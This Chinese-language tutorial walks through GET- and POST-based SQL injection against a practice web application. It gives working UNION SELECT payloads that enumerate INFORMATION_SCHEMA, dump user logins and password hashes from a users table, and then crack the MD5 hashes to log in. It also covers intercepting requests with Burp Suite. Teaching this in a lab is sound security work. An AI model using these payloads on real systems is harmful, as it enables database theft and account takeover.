GET 型注入攻击
将自己的环境启动起来,选择SQL Injection (GET/Search) ,然后点击hack,跳转到指定的页面,跳转到页面之后,点击查询,可以输出所有的数据:
data:image/s3,"s3://crabby-images/6bb3d/6bb3daa7c9b397f64b268384030c58d191539827" alt=""
在搜素框中,输入2‘,输出页面为错误:
data:image/s3,"s3://crabby-images/ef40f/ef40fdc9a5c824d260dc5d10e9708135f245e379" alt=""
在搜索框中输入‘union select 1,2 --’,输出的页面为:
data:image/s3,"s3://crabby-images/41235/412353f7e2ab29d7ba603facdba2c75a24811a0e" alt=""
从返回的提示为:字段数量不对,通过增加字段数量来进行请求,保证数据可以正常返回,
输入为:'union select 1,2,3,4,5,6,7 --',
data:image/s3,"s3://crabby-images/5e95e/5e95ef4f6a960bf89d72f4ef23eeeb39ed92d53c" alt=""
在输入框中输入:union select 1,user(),database(),table_name,version(),6,7 from
INFORMATION_SCHEMA.tables where table_schema=database() -- ' ,最后的这个单引号前面需要留一个空格,或者使用union select 1,user(),database(),table_name,version(),6,7 from
INFORMATION_SCHEMA.tables where table_schema=database() --+'这种语句,查看输出的数据:
data:image/s3,"s3://crabby-images/5b0b4/5b0b46b2ad48063a1b3db14187e01314438187bd" alt=""
可以看到输出的用户名、数据库名字、数据库版本、数据表等信息,通过输出信息,需要找到用户的,应该就是users表,在输入框中输入:
union select 1,column_name,3,4,5,6,7 from
INFORMATION_SCHEMA.columns where table_name='users' --+'
可以看到输出为:
data:image/s3,"s3://crabby-images/40f68/40f68e152adc64eed79c55b12735b2869354379c" alt=""
可以看到users这个表中的字段,选择id,login,password作为输出的信息,填写信息如下:
union select 1,id,login,password,5,6,7 from users --+'
data:image/s3,"s3://crabby-images/444ab/444ab3df4f6d07bf2a8b9dbda0337700638c1a6e" alt=""
可以通过反向解析(md5),来把密码解析,将密码解析出来。在解析出密码之后,尝试登录,看是否拿到用户的账号信息。
POST 型注入攻击
选择SQL Injection (POST/Select) ,进入页面,打开Burp Suite,可以根据自己的电脑,选择相应的版本进行下载,需要进行设置:
data:image/s3,"s3://crabby-images/2d804/2d804e3f39633de341bbdad99d5ba0e653fdafd0" alt=""
设置完成之后,打开web页面:
data:image/s3,"s3://crabby-images/2e71d/2e71df02a63801cc0d80875c1596b3fefb1fdea9" alt=""
在浏览器中输入地址,跳转到指定页面,开始监听请求:
data:image/s3,"s3://crabby-images/c9b56/c9b5623ab9b0e1f159a3bf70f24367f8ef815dd5" alt=""
将请求参数转到repeater模块,然后进行验证是否有漏洞,在参数中,输入movie=1'&action=go,通过返回的数据为sql的异常提示,表示存在漏洞,可以进行尝试攻击:
data:image/s3,"s3://crabby-images/0d2df/0d2df56f673b7df5ae40cd8627488e3d881ffe88" alt=""
修改请求参数之后,输入的内容:movie=1 union select 1,2,3,4,5,6,7 from information_schema.tables -- &action=go,可以看到返回是否正确:
data:image/s3,"s3://crabby-images/26b5d/26b5d86f844b3a199ecaa8cf57dd9f43921067c9" alt=""
输入sql语句,查询表的相关信息:
data:image/s3,"s3://crabby-images/0811d/0811dfded5bcbea7efb5189ff2e7d2c4abb9c005" alt=""
通过输入下面的语句movie=11 union select 1,group_concat(table_name separator ';'),3,4,5,6,7 from information_schema.tables where table_schema=database() -- &action=go,可以返回所有的数据表信息:
data:image/s3,"s3://crabby-images/637b4/637b486faacb4404f337cda71dc74e9465b81688" alt=""
通过返回的表信息,也识别到用户应该是存储在users表里面,做下面的尝试,
movie=11 union select 1,group_concat(id separator ';'),group_concat(login separator ';'),group_concat(password separator ';'),5,6,7 from users -- &action=go
data:image/s3,"s3://crabby-images/6bf1d/6bf1dc5464c35939bae863e65713af57b2f0c0a2" alt=""
可以将返回的用户名和密码进行解密,然后验证登录。
网友评论